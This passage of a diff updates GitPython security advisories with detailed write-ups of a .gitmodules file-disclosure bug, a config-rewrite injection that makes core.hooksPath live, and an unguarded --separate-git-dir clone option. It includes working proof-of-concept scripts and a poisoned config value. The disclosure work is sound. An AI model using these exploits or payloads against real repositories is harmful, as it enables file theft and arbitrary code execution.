different impact class (content disclosure, not directory creation).\n- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.\n- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.\n- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.\n\n## Remediation\nPass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.\n\n## Confidence\nHigh. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).\n\n\n## Proof-of-Concept source (`gitpython-003-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped\ninside a cloned repository -- can contain `[include] path = `.\n`Submodule._config_parser()` builds the parser used for `repo.submodules` (and\nother submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`\nwithout passing `merge_includes=False`, so the class default `merge_includes=True`\nis inherited. GitConfigParser then opens the target file; if it isn't valid\ngit-config syntax (true of virtually any non-gitconfig file), Python's\n`configparser.MissingSectionHeaderError` embeds the file's first line verbatim\nin its exception message, which propagates out of the ordinary, read-only\n`repo.submodules` call -- a non-blind local file content disclosure primitive.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-003-poc.py \n\nBenign: reads only the given (defaults to a throwaway secret file\ncreated under if omitted) and never writes/exfiltrates it anywhere\nexcept printing it locally to prove the primitive. No destructive action.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-003-poc\"\n target_file = sys.argv[2] if len(sys.argv) > 2 else os.path.join(workdir, \"secret.txt\")\n\n attacker_repo = os.path.join(workdir, \"attacker-repo\")\n dest = os.path.join(workdir, \"dest\")\n for p in (attacker_repo, dest):\n os.makedirs(p, exist_ok=True)\n\n if not os.path.exists(target_file):\n os.makedirs(os.path.dirname(target_file), exist_ok=True)\n with open(target_file, \"w\") as f:\n f.write(\"TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\\n\")\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", attacker_repo], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.email\", \"a@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.name\", \"Attacker\"], check=True)\n\n with open(os.path.join(attacker_repo, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n\n with open(os.path.join(attacker_repo, \".gitmodules\"), \"w\") as f:\n f.write(\n '[submodule \"totally-normal-dep\"]\\n'\n \"\\tpath = vendor/dep\\n\"\n \"\\turl = https://example.com/dep.git\\n\"\n \"[include]\\n\"\n \"\\tpath = %s\\n\" % target_file\n )\n\n subprocess.run([\"git\", \"-C\", attacker_repo, \"add\", \"file.txt\", \".gitmodules\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n import configparser\n\n repo = git.Repo.clone_from(attacker_repo, dest)\n\n try:\n subs = list(repo.submodules)\n print(\"NOT VULNERABLE: no exception raised, submodules =\", subs)\n sys.exit(1)\n except configparser.MissingSectionHeaderError as e:\n msg = str(e)\n print(\"VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:\")\n print(msg)\n with open(target_file) as f:\n first_line = f.readline().rstrip(\"\\n\")\n if first_line in msg:\n print(\"Confirmed: target file's first line is present verbatim in the exception message.\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: exception message did not contain the expected content\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78675" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2211" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/ef7568e3b317ce617eacda39b8b54dcdff8c3b5c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3785.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-78676.json b/advisories/BREW-tartufo-CVE-2026-78676.json index 70bc04b037..df68a67205 100644 --- a/advisories/BREW-tartufo-CVE-2026-78676.json +++ b/advisories/BREW-tartufo-CVE-2026-78676.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-78676", "published": "2026-09-04T10:12:20Z", - "modified": "2026-09-05T10:16:40Z", + "modified": "2026-09-10T21:07:24Z", "upstream": [ "PYSEC-2026-3786", "CVE-2026-78676", @@ -52,21 +52,38 @@ } ] }, - "details": "GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.", + "summary": "GitPython: Dormant multi-line git-config values are corrupted into live injected directives (e.g. core.hooksPath) on any unrelated GitConfigParser write, enabling RCE", + "details": "- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument\n- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\nGitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\\r`/`\\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.\n\nThat guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.\n\nThe bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and \"handles\" any embedded newline in the value with `.replace(\"\\n\", \"\\n\\t\")` (line 708), emitting a bare, unquoted `` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `\\nhooksPath = `, that second line is parsed as a brand-new `core.hooksPath = ` directive — live, real Git configuration, not a value.\n\n`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.\n\n## Root cause\n`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *\"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values\"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.\n\n## Exploit path\n1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:\n ```\n [core]\n \tzzz = \"A\\nhooksPath = ../evil-hooks\\\n \"\n ```\n No raw `\\r`, `\\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.\n2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value(\"user\", \"name\", \"Test User\")`. This is one of the most ordinary operations a GitPython-based tool performs.\n3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:\n ```\n [core]\n \t...\n \tzzz = A\n \thooksPath = ../evil-hooks\n ```\n4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.\n5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.\n\n## Impact\nArbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` \"Newline injection... enables RCE via core.hooksPath\" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.\n\n## Preconditions\n- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `\\n = `. Realistic delivery:\n 1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, \"repo\" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.\n 2. **The documented shared-config `[include]` pattern** (`[include] path = ../`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).\n 3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\\n` escape into a real embedded LF.\n- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace(\"\\n\", \"\\n\\t\")` with no re-quoting.\n- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.\n- `git log -S\"string_decode\"`, `-S\"write_section\"`, `-S'replace(\"\\n\", \"\\n\\t\")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.\n- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.\n\n## False-positive check (adversarial re-read)\n- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.\n- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a \"normal\" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.\n- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.\n- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).\n\n## Remediation\nEither (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.\n\n## Confidence\nHigh. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.\n\n\n## Proof-of-Concept source (`gitpython-002-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value\n(standard quoted + backslash-continuation syntax, containing an escaped \"\\\\n\"\nthat decodes to a real embedded newline in memory) is corrupted into a NEW,\nlive config key the moment GitConfigParser re-serializes it during any\nunrelated write. If the smuggled second \"line\" looks like\n\"hooksPath = \", it becomes a real, active core.hooksPath after\none unrelated GitPython config write, and fires attacker code on the next\nhook-triggering git operation (e.g. `git commit`).\n\nThis is CWE-88/CWE-94 style argument/config injection, but via the READ path\n(a config file GitPython parses and later rewrites), not via a Python kwarg\nargument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /\nGHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all\nguard the setter-argument surface only.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-002-poc.py \n\nBenign: only writes/reads inside . The \"malicious\" hook just writes a\nmarker file; no destructive/exfiltrating payload. Exits non-zero and prints\n\"NOT VULNERABLE\" if the corruption / hook does not fire.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-002-poc\"\n repo_dir = os.path.join(workdir, \"repo\")\n hooks_dir = os.path.join(workdir, \"evil-hooks\")\n marker = os.path.join(workdir, \"PWNED_MARKER.txt\")\n\n for p in (repo_dir, hooks_dir):\n os.makedirs(p, exist_ok=True)\n if os.path.exists(marker):\n os.remove(marker)\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", repo_dir], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.name\", \"Test\"], check=True)\n\n # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value\n # inside [core] (before any other section). No raw CR/LF/NUL byte is\n # written to disk here -- this is standard git config quoting +\n # backslash-line-continuation, decoded by both real git and GitConfigParser\n # into the Python string 'A\\nhooksPath = ../evil-hooks'.\n cfg_path = os.path.join(repo_dir, \".git\", \"config\")\n with open(cfg_path) as f:\n original = f.read()\n poisoned_entry = '\\tzzz = \"A\\\\nhooksPath = ../evil-hooks\\\\\\n\"\\n'\n # Insert right after the [core] header line so it lives in the same section.\n new_config = original.replace(\"[core]\\n\", \"[core]\\n\" + poisoned_entry, 1)\n with open(cfg_path, \"w\") as f:\n f.write(new_config)\n\n # Confirm it's inert per real git before touching GitPython.\n pre = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if pre.returncode == 0:\n print(\"SETUP ERROR: core.hookspath already set before GitPython touched anything\")\n sys.exit(2)\n\n # Malicious hook: benign marker only.\n hook_path = os.path.join(hooks_dir, \"pre-commit\")\n with open(hook_path, \"w\") as f:\n f.write('#!/bin/sh\\necho \"PWNED-VIA-GITPYTHON-CONFIG-INJECTION\" > \"%s\"\\nexit 0\\n' % marker)\n os.chmod(hook_path, 0o755)\n\n import git # gitpython under test\n\n repo = git.Repo(repo_dir)\n before = repo.config_reader().get_value(\"core\", \"zzz\")\n print(\"core.zzz before any GitPython write =\", repr(before))\n\n # ONE totally unrelated, benign write -- this is the only \"attacker-adjacent\"\n # action required, and it is something virtually every GitPython consumer\n # does routinely (setting an option, adding a remote, updating a branch's\n # tracking config, ...).\n with repo.config_writer() as cw:\n cw.set_value(\"user\", \"name\", \"Test User\")\n\n post = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if post.returncode != 0:\n print(\"NOT VULNERABLE: core.hookspath still absent after the unrelated write\")\n sys.exit(1)\n\n injected_path = post.stdout.strip()\n print(\"core.hookspath is now LIVE after one unrelated write:\", injected_path)\n\n # Trigger the hook with a normal commit to prove it fires.\n with open(os.path.join(repo_dir, \"file2.txt\"), \"w\") as f:\n f.write(\"change\\n\")\n subprocess.run([\"git\", \"-C\", repo_dir, \"add\", \"file2.txt\"], check=True)\n subprocess.run(\n [\"git\", \"-C\", repo_dir, \"-c\", \"user.email=t@example.com\", \"-c\", \"user.name=T\",\n \"commit\", \"-q\", \"-m\", \"trigger hook\"],\n check=True,\n )\n\n if os.path.isfile(marker):\n with open(marker) as f:\n content = f.read().strip()\n print(\"VULNERABLE: hook fired, marker content =\", content)\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: hook did not fire\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78676" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3786.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-78677.json b/advisories/BREW-tartufo-CVE-2026-78677.json index d87cb75ef0..06d9c95214 100644 --- a/advisories/BREW-tartufo-CVE-2026-78677.json +++ b/advisories/BREW-tartufo-CVE-2026-78677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-78677", "published": "2026-09-04T10:12:20Z", - "modified": "2026-09-05T10:16:40Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "PYSEC-2026-3787", "CVE-2026-78677", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.", + "summary": "GitPython: clone_from()/clone() omit --separate-git-dir from unsafe_git_clone_options, enabling arbitrary git-directory creation outside the destination", + "details": "- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the \"escapes intended base directory\" sense)\n- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).\n\n`git clone` also accepts `--separate-git-dir=`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: `) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *\"Redirects the repository metadata to a caller-controlled path\"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:\n\n```\n:param allow_unsafe_options:\n Allow unsafe options to be used, such as ``--template`` and\n ``--separate-git-dir``.\n```\n\ni.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:\n\n```python\nunsafe_git_clone_options = [\n \"--upload-pack\",\n \"-u\",\n \"--config\",\n \"-c\",\n \"--template\",\n \"--bundle-uri\",\n]\n```\n\nSo any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.\n\n## Root cause\nParity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same \"denylist omits an equally-dangerous sibling option\" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).\n\n## Exploit path\n1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `\"separate-git-dir\"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.\n2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.\n3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=` and GitPython executes `git clone -v --separate-git-dir= -- ` via `subprocess` (no shell).\n4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.\n\n## Impact\nArbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` (\"Arbitrary Git Repository Creation Outside the Working Tree\", CVSS 8.2). Concretely:\n- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.\n- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.\n- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.\n\n## Preconditions\n- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.\n- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.\n\n## Evidence\n- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `\"--separate-git-dir\"` with the comment \"Redirects the repository metadata to a caller-controlled path\".\n- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `\"--separate-git-dir\"`.\n- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.\n- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.\n- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.\n\n## False-positive check (adversarial re-read)\n- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).\n- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.\n- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — 